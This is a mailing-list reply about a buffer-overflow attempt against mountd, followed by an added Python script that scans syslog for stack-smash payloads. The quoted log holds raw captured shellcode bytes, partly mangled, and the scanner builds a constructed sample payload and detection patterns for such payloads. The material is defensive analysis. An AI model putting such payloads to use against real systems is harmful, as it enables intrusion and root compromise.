Ben Pfaff wrote:
> [CC:'s are appreciated; I am not subscribed to debian-user. Thanks!]
>
> I got the following logged in my /var/log/syslog today. It looks to me
> like a buffer overflow attack of some kind (character is `no
> operation' in x86 assembly language). Does anyone know of a
> vulnerability in mountd to this sort of thing?

Yes, this particular exploit has to be the most-tried on the net right now.
I've had it tried against my system no fewer than 8 times in the past 2
months. Current versions of debian are not vulnerable. It's a buffer overrun
exploit leading to root shell, I think.

> Jan 31 18:26:41 pfaffben 29>Jan 31 18:26:41 mountd[355]: NFS mount of
> 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet
> ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben
> ^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H
> attempted from 129.247.106.135
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: NFS client <anon clnt> tried to access
> 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ1À°^A1ÛÍ0È1EÿÿÿÿýÿPrivet
> ADMcrew(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(
> Jan 31 18:26:41 pfaffben
> -^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H
>
> Jan 31 18:26:41 pfaffben syslogd: Cannot glue message parts together
> Jan 31 18:26:41 pfaffben mountd[355]: Blocked attempt of 129.247.106.135 to
> mount
> 3Û3À°^[Í3Ò3ÀÚ°^FÍ0Þ¢1uô1À°^BÍ,[EMAIL PROTECTED](Bubëb^V¬<ýt^FþÀt^Këõ°0þÈFÿëì^°^B^FþÈF^D°^FF^H°f1ÛþÃ(IqÍ(B^F°^BfF^L°*fF^NF^LF^D1ÀF^P°^PF^H°fþÃÍ01^AF^D°f³^DÍ0Ë1^DëLëR1ÀF^DF^H°fþÃÍ,HC°([EMAIL PROTECTED]@F^D1ÀF^Gv^HF^L°^K(Is(BN^HV^LÍ

It's worth informing the admins of this box that their box has been cracked
and is being used as a platform to attack others. It's also worthwhile
informing their ISP about this in case this is the cracker's actual home
machine.

-- 
see shy jo
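The thread above is about recognising a stack-smash attempt from the shape of what mountd logged as the "path" the client asked for. A small log scanner that does this mechanically is shown below. It is an added example, not code from either poster or from the mountd/nfs-utils project. It looks for the three traits a classic stack overflow payload tends to have in a logged string: a run of NOP bytes (0x90 on x86), a short burst of non-printable bytes (the shellcode itself), and one 4-byte value repeated many times (the overwritten return address). The sample syslog lines, the source addresses, and the thresholds are constructed for this example; the two mountd message formats it parses are modelled on the shapes visible in the quoted log.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional, Tuple

# Constructed sample syslog lines (not taken from the post above). The second
# line imitates a stack-smash payload: 64 NOPs, a few bytes of shellcode, then
# the same 4-byte "return address" repeated 40 times.
SAMPLE_LINES = [
    "Jan 31 18:26:41 host mountd[355]: NFS mount of /home attempted from 192.0.2.10",
    "Jan 31 18:26:41 host mountd[355]: NFS mount of "
    + "\x90" * 64
    + "\x31\xc0\xb0\x1b\xcd\x80"
    + "\x28\x2d\x05\x08" * 40
    + " attempted from 192.0.2.99",
    "Jan 31 18:26:41 host syslogd: Cannot glue message parts together",
    "Jan 31 18:26:42 host mountd[355]: Blocked attempt of 192.0.2.99 to mount /export",
]

# The two mountd message shapes that carry the client-supplied path.
MOUNT_PATTERNS = [
    re.compile(rb"mountd\[(?P<pid>\d+)\]: NFS mount of (?P<payload>.*) attempted from (?P<src>\S+)$", re.DOTALL),
    re.compile(rb"mountd\[(?P<pid>\d+)\]: Blocked attempt of (?P<src>\S+) to mount (?P<payload>.*)$", re.DOTALL),
]

NOP_RUN = re.compile(rb"\x90+")            # x86 NOP sled
REPEATED_DWORD = re.compile(rb"(.{4})\1+", re.DOTALL)  # same 4 bytes back to back

# Thresholds are assumptions chosen for this example, not values from the post.
MIN_NOP_SLED = 8
MIN_DWORD_REPEATS = 8
MAX_NONPRINTABLE_RATIO = 0.3


@dataclass
class Finding:
    src: str                  # client address as logged by mountd
    payload_len: int          # length of the logged "path" in bytes
    nop_sled: int             # longest run of 0x90 bytes
    repeated_dword: Optional[bytes]  # most-repeated 4-byte value, if any
    dword_repeats: int        # how many times it repeats back to back
    nonprintable_ratio: float # share of bytes outside 0x20..0x7e

    @property
    def suspicious(self) -> bool:
        return (
            self.nop_sled >= MIN_NOP_SLED
            or self.dword_repeats >= MIN_DWORD_REPEATS
            or (self.payload_len >= 16 and self.nonprintable_ratio > MAX_NONPRINTABLE_RATIO)
        )


def longest_nop_sled(payload: bytes) -> int:
    return max((len(m.group(0)) for m in NOP_RUN.finditer(payload)), default=0)


def longest_repeated_dword(payload: bytes) -> Tuple[Optional[bytes], int]:
    # Pick the longest back-to-back run of one 4-byte value; in a stack smash
    # that is usually the padded return address, not the NOP sled.
    best = max(REPEATED_DWORD.finditer(payload), key=lambda m: len(m.group(0)), default=None)
    if best is None:
        return None, 0
    return best.group(1), len(best.group(0)) // 4


def nonprintable_ratio(payload: bytes) -> float:
    if not payload:
        return 0.0
    bad = sum(1 for b in payload if b < 0x20 or b > 0x7E)
    return bad / len(payload)


def analyze_line(line: str) -> Optional[Finding]:
    # Treat each displayed glyph as one raw byte, the way the terminal showed them.
    raw = line.encode("latin-1")
    for pat in MOUNT_PATTERNS:
        m = pat.search(raw)
        if m:
            payload = m.group("payload")
            dword, repeats = longest_repeated_dword(payload)
            return Finding(
                src=m.group("src").decode("latin-1"),
                payload_len=len(payload),
                nop_sled=longest_nop_sled(payload),
                repeated_dword=dword,
                dword_repeats=repeats,
                nonprintable_ratio=nonprintable_ratio(payload),
            )
    return None  # not a mountd line that carries a client-supplied path


def scan(lines) -> list:
    """Return only the findings that trip one of the thresholds."""
    return [f for f in map(analyze_line, lines) if f is not None and f.suspicious]


if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"{f.src}: nop_sled={f.nop_sled} dword={f.repeated_dword!r}x{f.dword_repeats} "
              f"nonprintable={f.nonprintable_ratio:.2f}")
```

Note that syslogd's "Cannot glue message parts together" means the payload was split over several log records, so on a real log the string handed to `analyze_line` may be only part of the overflow; the repeated-dword and non-printable checks still fire on a fragment, which is why the scanner does not rely on the NOP sled alone.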